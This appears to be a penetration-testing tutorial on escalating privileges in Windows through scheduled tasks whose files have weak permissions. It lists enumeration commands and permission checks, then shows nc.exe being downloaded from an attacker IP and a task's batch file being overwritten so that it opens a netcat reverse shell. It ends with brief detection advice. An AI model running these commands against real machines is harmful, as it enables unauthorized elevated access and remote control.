we will be exploring vulnerable scheduled tasks; this time has to do with weak folder permissions.

Enumerate Scheduled tasks

1. Search for tasks

  • schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"
  • schtasks /query /fo LIST /v
  • schtasks /query /tn <TASKNAME> /fo list /v
  • schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
  • schtasks /query /fo LIST 2>nul | findstr TaskName
  • schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

Powershell

  • Get-ScheduledTask
  • Get-ScheduledTask | ft TaskName,TaskPath,State
  • Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

"Task to Run" parameter which indicates what gets executed by the scheduled task

"Run As User" parameter, which shows the user that will be used to execute the task.

2. Check If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacls:

  • icacls c:\tasks\schtask.bat

Note: As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like.

The permissions we are looking for on the file/folder are any one of the following three permissions:

  • (F) Full Control
  • (M) Modify
  • (W) Write

3. Interesting locations Start-Up folder

  • dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
  • dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
  • dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
  • dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
  • Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
  • Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"

Exploitation (Weak Permissions) Reverse shell

1. Knowing our user has rights to modify the program, we can transfer a netcat for windows program, and name the command with the permissions “Run as User” has. (https://github.com/int0x33/nc.exe/)

  • iwr http://10.9.139.128:9999/nc.exe -OutFile nc.exe

2. Having the program in the target machine, we can proceed to create a new file that will execute instead, we have to name it the same as in the schedule task

  • echo C:\tasks\nc.exe -e cmd.exe 10.9.139.128 4444 > C:\tasks\schtask.bat

Note: Make sure the file that will be executed, is in a directory that the scheduled task user can access and execute

3. You have to wait for the tasks to execute. Check your listener in your local machine

Detection

  • Tools such as Sysinternals Autoruns can detect system changes like showing presently scheduled jobs.
  • Tools like TCPView & Process Explore may help to identify remote connections for suspicious services or processes.
  • View Task Properties and History: To view a task’s properties and history by using a command line
  • Perform an audit scan to find out week or misconfiguration with the help of automated script using tools such as WinPeas, SharpUp, etc. Read more from here “Window Privilege Escalation: Automated Script”.
  • Make sure the scheduled task should not be run as SYSTEM.

Reference

https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/

https://juggernaut-sec.com/scheduled-tasks/

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries